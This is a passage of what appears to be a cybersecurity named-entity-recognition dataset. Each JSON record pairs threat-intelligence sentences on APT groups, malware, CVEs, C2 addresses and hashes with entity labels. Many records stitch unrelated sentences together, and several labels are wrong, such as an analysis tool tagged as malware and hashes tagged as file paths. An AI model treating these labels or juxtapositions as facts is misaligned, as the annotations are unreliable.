The malware samples deployed in both of these operations are updated versions of the KeyBoy backdoor first discussed in 2013 by Rapid7 .", "spans": {"THREAT_ACTOR: attackers": [[14, 23]], "MALWARE: MS PowerPoint document": [[32, 54]], "VULNERABILITY: CVE-2014-6352": [[80, 93]], "MALWARE: KeyBoy backdoor": [[181, 196]], "ORGANIZATION: Rapid7": [[224, 230]]}, "info": {"id": "cyberner_stix_train_003196", "source": "cyberner_stix_train"}} {"text": "From an external analysts ’ point of view , the wonder is , which is superior to the other .", "spans": {}, "info": {"id": "cyberner_stix_train_003197", "source": "cyberner_stix_train"}} {"text": "Protecting organizations from threats across domains and platforms Mobile threats continue to rapidly evolve , with attackers continuously attempting to sidestep technological barriers and creatively find ways to accomplish their goal , whether financial gain or finding an entry point to broader network compromise . Traditionally , the Ke3chang attackers have used spear-phishing emails with either a malware attachment or a link to a malicious download . The tool can work for almost all obfuscated functions in the tested sample . 
Mandiant is investigating multiple instances of successful exploitation of CVE-2023 - 4966 that resulted in the takeover of legitimate user sessions on NetScaler ADC and Gateway appliances .", "spans": {"THREAT_ACTOR: Ke3chang": [[338, 346]], "THREAT_ACTOR: attackers": [[347, 356]], "VULNERABILITY: CVE-2023 - 4966": [[610, 625]]}, "info": {"id": "cyberner_stix_train_003198", "source": "cyberner_stix_train"}} {"text": "This is the first time we have seen APT28 incorporate this exploit into their intrusions .", "spans": {"THREAT_ACTOR: APT28": [[36, 41]]}, "info": {"id": "cyberner_stix_train_003199", "source": "cyberner_stix_train"}} {"text": "The malicious developer ’ s apps published on the App Store which don ’ t contain the Ashas adware Searching further for the malicious developer ’ s activities , we also discovered his Youtube channel propagating the Ashas adware and his other projects . The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . SHA256 : 92600679bb183c1897e7e1e6446082111491a42aa65a3a48bd0fceae0db7244f .", "spans": {"MALWARE: Ashas": [[86, 91], [217, 222]], "SYSTEM: Youtube": [[185, 192]], "MALWARE: flare-qdb": [[273, 282]], "FILEPATH: 92600679bb183c1897e7e1e6446082111491a42aa65a3a48bd0fceae0db7244f": [[350, 414]]}, "info": {"id": "cyberner_stix_train_003200", "source": "cyberner_stix_train"}} {"text": "An organization whose certificate has been stolen and used to sign malware will always be associated with that activity .", "spans": {}, "info": {"id": "cyberner_stix_train_003201", "source": "cyberner_stix_train"}} {"text": "Figure 8 . Waterbug has been using Meterpreter since at least early 2018 and , in this campaign , used a modified version of Meterpreter , which was encoded and given a .wav extension in order to disguise its true purpose . 
Our investigation into this campaign reveals that the actor used multiple malware implants , including an unknown implant with capabilities similar to Bankshot .", "spans": {"THREAT_ACTOR: Waterbug": [[11, 19]], "TOOL: Meterpreter": [[35, 46], [125, 136]], "THREAT_ACTOR: actor": [[278, 283]], "MALWARE: Bankshot": [[375, 383]]}, "info": {"id": "cyberner_stix_train_003202", "source": "cyberner_stix_train"}} {"text": "While the malware is custom , it only provides the attackers with standard back door capabilities .", "spans": {"TOOL: back door": [[75, 84]]}, "info": {"id": "cyberner_stix_train_003203", "source": "cyberner_stix_train"}} {"text": "They also used WinRAR and cURL for Windows , both often renamed , to compress and upload the exfiltrated files from the Visma network to the Dropbox API . We also discovered an interesting piece of rare malware created by this threat actor – a Bluetooth device harvester .", "spans": {"TOOL: Visma": [[120, 125]], "TOOL: Dropbox API": [[141, 152]], "MALWARE: malware": [[203, 210]], "FILEPATH: Bluetooth device harvester": [[244, 270]]}, "info": {"id": "cyberner_stix_train_003204", "source": "cyberner_stix_train"}} {"text": "According to publicly available statistics , as well as confirmation from Google , most of these apps collected a few dozens installations each , with one case reaching over 350 . Unit 42 's ongoing research into the OilRig campaign shows that the threat actors involved in the original attack campaign continue to add new Trojans to their toolset and continue their persistent attacks in the Middle East . As we explained before , the RAT targets specific countries by checking the keyboard 's layout . 
We provide at - risk organizations with the following discovery methods to conduct threat hunts for tactics , techniques , and procedures ( TTPs ) implemented derived from the toolset : • Establish collection and aggregation of host - based logs for crown jewels systems such as human - machine interfaces ( HMI ) , engineering workstations ( EWS ) , and OPC client servers within their environments and review logs for the evidence of Python script or unauthorized code execution on these systems .", "spans": {"ORGANIZATION: Google": [[74, 80]], "ORGANIZATION: Unit 42": [[180, 187]], "THREAT_ACTOR: threat actors": [[248, 261]], "TOOL: RAT": [[436, 439]], "ORGANIZATION: risk organizations": [[520, 538]], "SYSTEM: human - machine interfaces ( HMI": [[783, 815]], "SYSTEM: engineering workstations": [[820, 844]], "SYSTEM: EWS": [[847, 850]], "SYSTEM: OPC client servers within their environments": [[859, 903]]}, "info": {"id": "cyberner_stix_train_003205", "source": "cyberner_stix_train"}} {"text": "In a brief stint , TA505 distributed it in one large campaign in July , but we have not seen them use it since .", "spans": {"THREAT_ACTOR: TA505": [[19, 24]]}, "info": {"id": "cyberner_stix_train_003206", "source": "cyberner_stix_train"}} {"text": "To perform some of its activities , the malware does not need high privileges inside the device , as we will explain ahead . PwC UK and BAE Systems , working closely with industry and government , have uncovered a new , unparallelled campaign which we refer to as Operation Cloud Hopper . We have contacted ASUS and informed them about the attack on Jan 31 , 2019 , supporting their investigation with IOCs and descriptions of the malware . 
• None consisting of CVE-2022 - 41080 and CVE-2022 - 41082 to achieve remote code execution ( RCE ) through Outlook Web Access ( OWA ) .", "spans": {"ORGANIZATION: PwC UK": [[125, 131]], "ORGANIZATION: BAE Systems": [[136, 147]], "ORGANIZATION: industry": [[171, 179]], "ORGANIZATION: government": [[184, 194]], "ORGANIZATION: ASUS": [[307, 311]], "VULNERABILITY: CVE-2022 - 41080": [[462, 478]], "VULNERABILITY: CVE-2022 - 41082": [[483, 499]], "TOOL: Outlook Web Access ( OWA )": [[549, 575]]}, "info": {"id": "cyberner_stix_train_003207", "source": "cyberner_stix_train"}} {"text": "PsExec is a Microsoft Sysinternals tool for executing processes on other systems and is one of the most frequently seen legitimate pieces of software used by attackers attempting to live off the land . If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros .", "spans": {"TOOL: PsExec": [[0, 6]], "VULNERABILITY: CVE-2012-0158": [[266, 279]], "VULNERABILITY: CVE-2013-3906": [[282, 295]], "VULNERABILITY: CVE-2014-1761": [[299, 312]]}, "info": {"id": "cyberner_stix_train_003208", "source": "cyberner_stix_train"}} {"text": "Copy the contents from the client response object into the translated server object .", "spans": {}, "info": {"id": "cyberner_stix_train_003209", "source": "cyberner_stix_train"}} {"text": "The titles and contents of these files suggest that the actor targeted individuals affiliated with these government agencies and the Fatah political party . Icefog , also known as the \" Dagger Panda \" by Crowdstrike 's naming convention , infected targets mainly in South Korea and Japan . For example , we observed an APT attacker pasting the string “ czo1NA== ” into an HTML page . 
When an attacker pays for an as - a - service malware , they often get an individual login with dedicated customer support , much like any user would with a legitimate piece of software .", "spans": {"ORGANIZATION: Fatah": [[133, 138]], "THREAT_ACTOR: Icefog": [[157, 163]], "THREAT_ACTOR: Dagger Panda": [[186, 198]], "ORGANIZATION: Crowdstrike": [[204, 215]], "TOOL: HTML": [[372, 376]], "THREAT_ACTOR: attacker": [[392, 400]], "MALWARE: as - a - service malware": [[413, 437]]}, "info": {"id": "cyberner_stix_train_003210", "source": "cyberner_stix_train"}} {"text": "Some of the targeted apps were : Whatsapp YouTube Video Downloader Google Update Instagram Hack Wifi AirDroid WifiHacker Facebook Photoshop SkyTV Hotstar Trump Dash PokemonGo With many more to come . Group-IB specialists determined that the email addresses of IT bank employees were among the recipients of these emails . If successful , Cobalt goes on to attack financial institutions outside the country .", "spans": {"SYSTEM: Whatsapp": [[33, 41]], "SYSTEM: YouTube Video Downloader": [[42, 66]], "SYSTEM: Google Update": [[67, 80]], "SYSTEM: Instagram": [[81, 90]], "SYSTEM: Hack Wifi": [[91, 100]], "SYSTEM: AirDroid": [[101, 109]], "SYSTEM: WifiHacker": [[110, 120]], "SYSTEM: Facebook": [[121, 129]], "SYSTEM: Photoshop": [[130, 139]], "SYSTEM: SkyTV": [[140, 145]], "SYSTEM: Hotstar": [[146, 153]], "SYSTEM: Trump Dash": [[154, 164]], "SYSTEM: PokemonGo": [[165, 174]], "ORGANIZATION: Group-IB": [[200, 208]], "ORGANIZATION: bank": [[263, 267]], "ORGANIZATION: employees": [[268, 277]], "THREAT_ACTOR: Cobalt": [[338, 344]], "ORGANIZATION: financial institutions": [[363, 385]]}, "info": {"id": "cyberner_stix_train_003211", "source": "cyberner_stix_train"}} {"text": "Kegotip is an infostealer ( credentials and email addresses ) used to facilitate other crimeware activities .", "spans": {"MALWARE: Kegotip": [[0, 7]], "TOOL: infostealer": [[14, 25]], "TOOL: email": [[44, 49]]}, "info": {"id": 
"cyberner_stix_train_003212", "source": "cyberner_stix_train"}} {"text": "During investigation of the Command & Control server ( with IP 176.31.112.10 hardcoded in Artifact #2 ) , we managed to identify some operational mistakes made by the attackers , allowing us to connect the incident with attacks previously associated with the Sofacy Group .", "spans": {"TOOL: Command & Control": [[28, 45]], "IP_ADDRESS: 176.31.112.10": [[63, 76]], "THREAT_ACTOR: Sofacy": [[259, 265]]}, "info": {"id": "cyberner_stix_train_003213", "source": "cyberner_stix_train"}} {"text": "Android ’ s accessibility services were originally developed by Google for the benefit of users with disabilities . The threat actors , observed by FireEye Labs , use a variety of different methods to either compromise or acquire already compromised payment card credentials , including sharing or purchasing dumps online , hacking vulnerable merchant websites and compromising payment card processing devices . On August 23 , 2017 , we observed OilRig targeting an organization within the United Arab Emirates government .", "spans": {"SYSTEM: Android": [[0, 7]], "ORGANIZATION: Google": [[64, 70]], "THREAT_ACTOR: actors": [[127, 133]], "ORGANIZATION: FireEye Labs": [[148, 160]], "THREAT_ACTOR: OilRig": [[446, 452]], "ORGANIZATION: government": [[511, 521]]}, "info": {"id": "cyberner_stix_train_003214", "source": "cyberner_stix_train"}} {"text": "This newly observed activity uses a series of redirections and fileless , malicious implementations of legitimate tools to gain access to the targeted systems . 
In 2015 , the SecureWorks® Counter Threat Unit™ ( CTU ) research team documented the BRONZE UNION threat group ( formerly labeled TG-3390 ) , which CTU™ analysis suggests is based in the People's Republic of China ( PRC ) .", "spans": {"ORGANIZATION: SecureWorks® Counter Threat Unit™": [[175, 208]], "ORGANIZATION: CTU": [[211, 214]], "THREAT_ACTOR: TG-3390": [[291, 298]], "ORGANIZATION: CTU™": [[309, 313]], "ORGANIZATION: People's Republic of China": [[348, 374]], "ORGANIZATION: PRC": [[377, 380]]}, "info": {"id": "cyberner_stix_train_003215", "source": "cyberner_stix_train"}} {"text": "They target groups across Middle East and Central Asia , primarily using spear phishing emails with malicious attachments .", "spans": {"TOOL: emails": [[88, 94]]}, "info": {"id": "cyberner_stix_train_003216", "source": "cyberner_stix_train"}} {"text": "The record contains a personal email address : WHOIS records of C2 server exposing the attacker ’ s email address We were aware of the possibility that the attackers might be using a compromised email account , so we dug deeper to find more information related to this email address . From at least February 2019 to present , the actors in the LUCKY ELEPHANT campaign copied webpages to mimic South Asian government websites as well as Microsoft Outlook 365 login pages and hosted them on their own doppelganger domains , presumably to trick victims into providing login credentials . 
GreezaBackdoor of DarkHotel : 5e0e11bca0e94914e565c1dcc1ee6860 .", "spans": {"THREAT_ACTOR: LUCKY ELEPHANT": [[344, 358]], "ORGANIZATION: South Asian government websites": [[393, 424]], "ORGANIZATION: Microsoft Outlook": [[436, 453]], "MALWARE: GreezaBackdoor": [[585, 599]], "THREAT_ACTOR: DarkHotel": [[603, 612]], "FILEPATH: 5e0e11bca0e94914e565c1dcc1ee6860": [[615, 647]]}, "info": {"id": "cyberner_stix_train_003217", "source": "cyberner_stix_train"}} {"text": "Network activity BrainTest communicates with five servers : APK files provider ( http : //psserviceonline [ . A well-funded , highly active group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group . Following the trail of existing public reporting , the tie to FIN7 is essentially made based on a download observed from a MuddyWater C2 , of a non-public tool \" DNSMessenger \" .", "spans": {"THREAT_ACTOR: group": [[140, 145]], "THREAT_ACTOR: hackers": [[164, 171]], "VULNERABILITY: zero-day exploit": [[215, 231]], "THREAT_ACTOR: Gamma Group": [[357, 368]], "THREAT_ACTOR: FIN7": [[433, 437]], "MALWARE: MuddyWater C2": [[494, 507]], "MALWARE: non-public tool": [[515, 530]], "MALWARE: DNSMessenger": [[533, 545]]}, "info": {"id": "cyberner_stix_train_003218", "source": "cyberner_stix_train"}} {"text": "Methods and techniques 2013 not only saw a radical increase in output from mobile virus writers but also saw them actively applying methods and technologies that allowed cybercriminals to use their malware more effectively . The campaign is believed to be active covertly since fall 2017 . These protests gathered hundreds of thousands of people in the streets with large support from students of Hong Kong universities , leading to multiple university campus occupations by the protesters . 
PIEHOP utilizes LIGHTWORK to execute the IEC-104 commands \" ON ” or \" OFF \" on the remote system and immediately deletes the executable after issuing the commands .", "spans": {"TOOL: PIEHOP": [[492, 498]], "TOOL: LIGHTWORK": [[508, 517]]}, "info": {"id": "cyberner_stix_train_003219", "source": "cyberner_stix_train"}} {"text": "Hamas , who has historically maintained control over the strip , elected Yahya al-Sinwar – a hardliner from its military wing – as its leader in February .", "spans": {"ORGANIZATION: Hamas": [[0, 5]]}, "info": {"id": "cyberner_stix_train_003220", "source": "cyberner_stix_train"}} {"text": "Eastern countries . This week we will discuss another Chinese nexus adversary we call Samurai Panda . The second file follows a decodable binary format . As previously recommended , updating Windows , Java and Adobe Reader to the latest versions should provide a basic level of defense against the known Miniduke attacks .", "spans": {"ORGANIZATION: Java": [[201, 205]], "TOOL: Adobe Reader": [[210, 222]], "THREAT_ACTOR: the known Miniduke attacks": [[294, 320]]}, "info": {"id": "cyberner_stix_train_003221", "source": "cyberner_stix_train"}} {"text": "The client was likely built using the Quasar server client builder .", "spans": {"MALWARE: Quasar": [[38, 44]]}, "info": {"id": "cyberner_stix_train_003222", "source": "cyberner_stix_train"}} {"text": "This was also reinforced by their naming conventions , wherein different versions are simply named after the code iterations , following a specific format regardless of the actual function of the code .", "spans": {}, "info": {"id": "cyberner_stix_train_003223", "source": "cyberner_stix_train"}} {"text": "Additionally , some copies of Exodus One use the following XOR key : Rino Gattuso is a famous retired Italian footballer , originally from Calabria . TA459 is well-known for targeting organizations in Russia and neighboring countries . 
Downloads a Base64 encoded payload from the following URL : Apropos of my retrospective report , Bullock found that a great many messages in Biderman ’s inbox were belligerent and anti - Semitic screeds from a former Ashley Madison employee named William Brewster Harrison .", "spans": {"THREAT_ACTOR: TA459": [[150, 155]], "ORGANIZATION: Bullock": [[333, 340]], "ORGANIZATION: Ashley Madison employee": [[453, 476]], "ORGANIZATION: William Brewster Harrison": [[483, 508]]}, "info": {"id": "cyberner_stix_train_003224", "source": "cyberner_stix_train"}} {"text": "As we know from our investigation , traces of the first development activities were found at the end of 2016 , but the main distribution campaign began in 2018 ( end of 2017 ) . With the experience gained from the APT attack that began in March 2017 , it seems this campaign has evolved into an attack with new capabilities , and an even more specific target , over a year later . This malware uses Windows Bluetooth APIs to find information on connected Bluetooth devices and saves the following information .", "spans": {"SYSTEM: Windows": [[399, 406]], "TOOL: Bluetooth": [[407, 416], [455, 464]]}, "info": {"id": "cyberner_stix_train_003225", "source": "cyberner_stix_train"}} {"text": "] com and ora.studiolegalebasili [ . China Chopper is a tool that allows attackers to remotely control the target system that needs to be running a web server application before it can be targeted by the tool . Poison Ivy is a remote access tool that is freely available for download from its official web site at www.poisonivy-rat.com .", "spans": {"MALWARE: China Chopper": [[37, 50]], "THREAT_ACTOR: attackers": [[73, 82]], "MALWARE: Poison Ivy": [[211, 221]], "DOMAIN: www.poisonivy-rat.com": [[314, 335]]}, "info": {"id": "cyberner_stix_train_003226", "source": "cyberner_stix_train"}} {"text": "In April , at the time of writing this post , we recorded 413 RuMMS infections . 
The samples of ThreeDollars we collected in these attacks are structurally very similar to the first sample we analyzed in October 2017 , down to the lure image used to trick the recipient into clicking the \" Enable Content \" button to execute the malicious macro . The base64 data and image are separated by the \" **** \" string . School budgets are tight and institutions are understandably keen to direct their budgets at things that directly benefit pupils .", "spans": {"MALWARE: RuMMS": [[62, 67]], "TOOL: ThreeDollars": [[96, 108]], "ORGANIZATION: institutions": [[441, 453]]}, "info": {"id": "cyberner_stix_train_003227", "source": "cyberner_stix_train"}} {"text": "For now , we observe only one payload version for following the ARM CPUs : arm64-v8a , armeabi , armeabi-v7a . The link to the final payload of KerrDown was still active during the time of analysis and hence we were able to download a copy which turned out to be a variant of Cobalt Strike Beacon . Magic Hound : Rocket Kitten , Operation Saffron Rose , Ajax Security Team , Operation Woolen-Goldfish , Newscaster , Cobalt Gypsy , APT35 .", "spans": {"SYSTEM: ARM": [[64, 67]], "SYSTEM: arm64-v8a": [[75, 84]], "SYSTEM: armeabi": [[87, 94]], "SYSTEM: armeabi-v7a": [[97, 108]], "MALWARE: KerrDown": [[144, 152]], "ORGANIZATION: we": [[208, 210]], "THREAT_ACTOR: Magic Hound": [[299, 310]], "THREAT_ACTOR: Rocket Kitten": [[313, 326]], "THREAT_ACTOR: Operation Saffron Rose": [[329, 351]], "THREAT_ACTOR: Ajax Security Team": [[354, 372]], "THREAT_ACTOR: Operation Woolen-Goldfish": [[375, 400]], "THREAT_ACTOR: Newscaster": [[403, 413]], "THREAT_ACTOR: Cobalt Gypsy": [[416, 428]], "THREAT_ACTOR: APT35": [[431, 436]]}, "info": {"id": "cyberner_stix_train_003228", "source": "cyberner_stix_train"}} {"text": "Using XREFs during static analysis is a common technique to quickly find where functions of interest are called . 
However , it is still widely used , notably in Russia .", "spans": {"TOOL: XREFs": [[6, 11]]}, "info": {"id": "cyberner_stix_train_003229", "source": "cyberner_stix_train"}} {"text": "Researchers from Bitdefender also released an analysis of one of the samples in a blogpost . Throughout 2017 and 2018 , Fxmsp established a network of trusted proxy resellers to promote their breaches on the criminal underground . One of the most notable functions of the initial dropper is to bypass Windows UAC ( User Account Control ) in order to execute the next payload with higher privileges . Stolen credentials can be resold to other threat actors tied to ransomware gangs .", "spans": {"THREAT_ACTOR: Fxmsp": [[120, 125]], "SYSTEM: Windows": [[301, 308]], "TOOL: UAC": [[309, 312]], "TOOL: User Account Control": [[315, 335]], "ORGANIZATION: Bitdefender": [[17, 28]]}, "info": {"id": "cyberner_stix_train_003230", "source": "cyberner_stix_train"}} {"text": "The malware was distributed from infected devices via SMS in the form “ % USERNAME % , I ’ ll buy under a secure transaction . The DeepSight Managed Adversary and Threat Intelligence (MATI) team co-authored this blog and its customers have received intelligence with additional details about these campaigns , the characteristics of the Waterbug (aka Turla) cyber espionage group , and methods of detecting and thwarting activities of this adversary . The malware has evolved over time .", "spans": {"ORGANIZATION: DeepSight Managed Adversary": [[131, 158]], "ORGANIZATION: Threat Intelligence": [[163, 182]], "THREAT_ACTOR: Waterbug": [[337, 345]], "ORGANIZATION: group": [[374, 379]]}, "info": {"id": "cyberner_stix_train_003231", "source": "cyberner_stix_train"}} {"text": "We chose the name “ HenBox ” based on metadata found in most of the malicious apps such as package names and signer detail . This technique was also observed against a government organizations in the Middle East and North African region . 
The group targeting Hong Kong media outlets is called admin@338 and is known to researchers for using publicly available remote access Trojans such as Poison Ivy to attack government and financial firms specializing in global economic policy .", "spans": {"MALWARE: HenBox": [[20, 26]], "ORGANIZATION: media": [[269, 274]], "THREAT_ACTOR: admin@338": [[293, 302]], "MALWARE: remote access Trojans": [[360, 381]], "MALWARE: Poison Ivy": [[390, 400]], "ORGANIZATION: government": [[411, 421]], "ORGANIZATION: financial firms": [[426, 441]], "ORGANIZATION: global economic": [[458, 473]]}, "info": {"id": "cyberner_stix_train_003232", "source": "cyberner_stix_train"}} {"text": "These tools include:AIRBREAK: a JavaScript-based backdoor also reported as Orz that retrieves commands from hidden strings in compromised webpages and actor controlled profiles on legitimate services.BADFLICK: a backdoor that is capable of modifying the file system , generating a reverse shell , and modifying its command and control (C2) configuration . RIPPER interacts with the ATM by inserting a specially manufactured ATM card with an EMV chip that serves as the authentication mechanism .", "spans": {"TOOL: JavaScript-based backdoor": [[32, 57]], "MALWARE: RIPPER": [[356, 362]]}, "info": {"id": "cyberner_stix_train_003233", "source": "cyberner_stix_train"}} {"text": ") to C & C ( calllog.php ) Whenever the user snaps a picture , either with the front or rear camera , it gets sent to the C & C ( uppc.php , fi npic.php orreqpic.php ) Can send GPS coordinates to C & C ( gps3.php ) The C & C server to which the application seems to be sending collected data appears to be operational , as of this writing , and running since May 2018 . Silence started by targeting organizations in Russia , gradually shifting their focus to former Soviet countries , and then the world . 
While FIN7 has embedded VBE as OLE objects for over a year , they continue to update their script launching mechanisms .", "spans": {"SYSTEM: GPS": [[177, 180]], "THREAT_ACTOR: Silence": [[370, 377]], "THREAT_ACTOR: FIN7": [[512, 516]], "MALWARE: VBE": [[530, 533]]}, "info": {"id": "cyberner_stix_train_003234", "source": "cyberner_stix_train"}} {"text": "While the malware is capable of facilitating various cyber-criminal goals , our team confirmed it ’ s currently installing additional apps on infected devices . According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . This section details changes made to APT10 tools , techniques and procedures ( TTPs ) post-2014 , following its shift from Poison Ivy to PlugX .", "spans": {"ORGANIZATION: security firm": [[178, 191]], "ORGANIZATION: military officials": [[224, 242]], "VULNERABILITY: Adobe Reader vulnerability": [[314, 340]], "THREAT_ACTOR: APT10": [[380, 385]], "MALWARE: Poison Ivy": [[466, 476]], "MALWARE: PlugX": [[480, 485]]}, "info": {"id": "cyberner_stix_train_003235", "source": "cyberner_stix_train"}} {"text": "Accordingly , the server side certificates appear to be generated locally on VPS hosts that exclusively are paid for at providers with bitcoin merchant processing .", "spans": {"TOOL: VPS": [[77, 80]]}, "info": {"id": "cyberner_stix_train_003236", "source": "cyberner_stix_train"}} {"text": "The HenBox app downloaded in May 2016 was masquerading as the DroidVPN app . The role of the .NET module is to deliver the known KopiLuwak JavaScript Trojan . 
Given the mission , resourcing , and location of PLA Unit 61398 , we conclude that PLA Unit 61398 is APT1 .", "spans": {"MALWARE: HenBox": [[4, 10]], "MALWARE: .NET module": [[93, 104]], "MALWARE: KopiLuwak JavaScript": [[129, 149]], "THREAT_ACTOR: PLA Unit 61398": [[208, 222], [242, 256]], "THREAT_ACTOR: APT1": [[260, 264]]}, "info": {"id": "cyberner_stix_train_003237", "source": "cyberner_stix_train"}} {"text": "The C & C role for Rotexy can be filled not only by a web server but also by any device that can send SMSs . In a separate incident , CTU researchers identified a file named s.txt , which is consistent with the output of the Netview host-enumeration tool . Symantec identified two strains of custom malware used by the Leafminer group : Trojan.Imecab and Backdoor.Sorgu .", "spans": {"MALWARE: Rotexy": [[19, 25]], "ORGANIZATION: CTU": [[134, 137]], "MALWARE: s.txt": [[174, 179]], "ORGANIZATION: Symantec": [[257, 265]], "THREAT_ACTOR: Leafminer group": [[319, 334]], "MALWARE: Trojan.Imecab": [[337, 350]], "MALWARE: Backdoor.Sorgu": [[355, 369]]}, "info": {"id": "cyberner_stix_train_003238", "source": "cyberner_stix_train"}} {"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . All of these early WhiteBear targets were related to embassies and diplomatic/foreign affair organizations .", "spans": {"MALWARE: documents": [[12, 21]], "VULNERABILITY: CVE-2017-0199": [[32, 45]], "MALWARE: WhiteBear": [[90, 99]], "ORGANIZATION: embassies": [[124, 133]]}, "info": {"id": "cyberner_stix_train_003239", "source": "cyberner_stix_train"}} {"text": "This time I'm going to focus on malicious CHM files used by Silence APT . 
It was during operator X 's network monitoring that the attackers placed Naikon proxies within the countries ' borders , to cloak and support real-time outbound connections and data Exfiltration from high-profile victim organizations .", "spans": {"TOOL: CHM files": [[42, 51]], "THREAT_ACTOR: Silence APT": [[60, 71]], "THREAT_ACTOR: attackers": [[130, 139]], "MALWARE: Naikon proxies": [[147, 161]]}, "info": {"id": "cyberner_stix_train_003240", "source": "cyberner_stix_train"}} {"text": "If an unsuspecting user grants these permissions ( see Figure 4 ) , the trojan can read any text displayed in any app the user may launch – and send it to the attackers . On June 14 , we saw TA505’s campaign still targeting UAE with similar tactics and techniques , but this time , some of the spam emails were delivered via the Amadey botnet . The Lazarus Group employs a variety of RATs and staging malware to conduct cyber operations , many of which contain significant code overlap that points to at least a shared development environment .", "spans": {"THREAT_ACTOR: TA505’s": [[191, 198]], "TOOL: Amadey botnet": [[329, 342]], "THREAT_ACTOR: Lazarus Group": [[349, 362]], "MALWARE: RATs": [[384, 388]], "MALWARE: staging": [[393, 400]], "MALWARE: malware": [[401, 408]]}, "info": {"id": "cyberner_stix_train_003241", "source": "cyberner_stix_train"}} {"text": "In a three-month period from August to October 2018 , it launched over 70,000 attacks against users located primarily in Russia . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia . 
Volgmer payloads have been observed in 32-bit form as either executables or dynamic-link library ( .dll )", "spans": {"THREAT_ACTOR: APT32": [[140, 145]], "MALWARE: Vietnam.exe": [[244, 255]], "ORGANIZATION: diaspora": [[315, 323]], "MALWARE: Volgmer": [[344, 351]], "TOOL: dynamic-link library": [[420, 440]], "FILEPATH: .dll": [[443, 447]]}, "info": {"id": "cyberner_stix_train_003242", "source": "cyberner_stix_train"}} {"text": "As seen in previous Downeks versions , it uses masquerades with icons , filenames and metadata imitating popular legitimate applications such as VMware workstation and CCleaner , or common file formats such as DOC and PDF .", "spans": {"MALWARE: Downeks": [[20, 27]], "TOOL: masquerades with icons": [[47, 69]], "TOOL: filenames": [[72, 81]], "TOOL: metadata imitating popular legitimate applications": [[86, 136]], "TOOL: VMware workstation": [[145, 163]], "TOOL: CCleaner": [[168, 176]], "TOOL: DOC": [[210, 213]], "TOOL: PDF": [[218, 221]]}, "info": {"id": "cyberner_stix_train_003243", "source": "cyberner_stix_train"}} {"text": "PLATINUM has used several zero-day exploits against their victims . Kaspersky Lab 's products detect the Microsoft Office exploits used in the spear-phishing attacks , including Exploit.MSWord.CVE-2010-333 , Exploit.Win32.CVE-2012-0158 .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "VULNERABILITY: zero-day exploits": [[26, 43]], "ORGANIZATION: Kaspersky Lab": [[68, 81]], "ORGANIZATION: Microsoft Office": [[105, 121]], "VULNERABILITY: exploits": [[122, 130]], "FILEPATH: Exploit.MSWord.CVE-2010-333": [[178, 205]], "FILEPATH: Exploit.Win32.CVE-2012-0158": [[208, 235]]}, "info": {"id": "cyberner_stix_train_003244", "source": "cyberner_stix_train"}} {"text": "This is also the first version where the package name changes into something that a less aware user may be tricked by , com.android.playup . Their primary interest appears to be gathering intelligence . FireEye dubbed this new malware family HIGHTIDE . 
RTM used Port 44443 for its VNC module .", "spans": {"ORGANIZATION: FireEye": [[203, 210]], "MALWARE: HIGHTIDE": [[242, 250]], "THREAT_ACTOR: RTM": [[253, 256]], "SYSTEM: VNC module": [[281, 291]]}, "info": {"id": "cyberner_stix_train_003245", "source": "cyberner_stix_train"}} {"text": "The PowerShell script will look at the architecture of the system to check which malicious DLL files should be downloaded . This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 .", "spans": {"TOOL: PowerShell script": [[4, 21]], "MALWARE: malicious DLL files": [[81, 100]], "TOOL: emails": [[176, 182]], "FILEPATH: Microsoft Word documents": [[188, 212]], "VULNERABILITY: CVE-2017-0199": [[224, 237]]}, "info": {"id": "cyberner_stix_train_003246", "source": "cyberner_stix_train"}} {"text": "Android shell A new package was added that allows the execution of commands in the Android shell . The malicious attachments purported to be invitations or drafts of the agenda for the conference . Jason_invitation.doc : 00a95fb30be2d6271c491545f6c6a707 , CVE-2012-0158 . Monitor network data flows for unexpected patterns and metadata that may be indicative of a mismatch between protocol and utilized port .", "spans": {"SYSTEM: Android": [[0, 7], [83, 90]], "MALWARE: malicious attachments": [[103, 124]], "TOOL: invitations": [[141, 152]], "TOOL: drafts of the agenda": [[156, 176]], "FILEPATH: Jason_invitation.doc": [[198, 218]], "FILEPATH: 00a95fb30be2d6271c491545f6c6a707": [[221, 253]], "VULNERABILITY: CVE-2012-0158": [[256, 269]]}, "info": {"id": "cyberner_stix_train_003247", "source": "cyberner_stix_train"}} {"text": ") “ % USERNAME % , je vous ai envoyé un prepaiement m-leboncoin [ . Kaspersky reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013 . 
The malware includes 2 domains: phpschboy.prohosts.org , jams481.site.bz .", "spans": {"ORGANIZATION: Kaspersky": [[68, 77]], "THREAT_ACTOR: APT33": [[91, 96]], "THREAT_ACTOR: group": [[110, 115]], "DOMAIN: phpschboy.prohosts.org": [[218, 240]], "DOMAIN: jams481.site.bz": [[243, 258]]}, "info": {"id": "cyberner_stix_train_003248", "source": "cyberner_stix_train"}} {"text": "Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099 , the observed RTF attachments download . It's coincident that both 'darkhydrus' APT group name and ‘Williams’ user name in PDB path found in this Twitter user .", "spans": {"VULNERABILITY: CVE-2017-1099": [[71, 84]], "MALWARE: RTF attachments": [[100, 115]], "THREAT_ACTOR: 'darkhydrus'": [[153, 165]], "THREAT_ACTOR: ‘Williams’": [[185, 195]], "ORGANIZATION: Twitter user": [[232, 244]]}, "info": {"id": "cyberner_stix_train_003249", "source": "cyberner_stix_train"}} {"text": "With the account credentials , the attackers were able to access the victim 's account and navigate the internal corporate network as though they were the employee .", "spans": {}, "info": {"id": "cyberner_stix_train_003250", "source": "cyberner_stix_train"}} {"text": "We were able to determine this because the attackers ’ hacktools are command line driven and can provide insight into when the operators are behind keyboards actively working .", "spans": {}, "info": {"id": "cyberner_stix_train_003251", "source": "cyberner_stix_train"}} {"text": "To set up persistence , the loader writes a file to \" 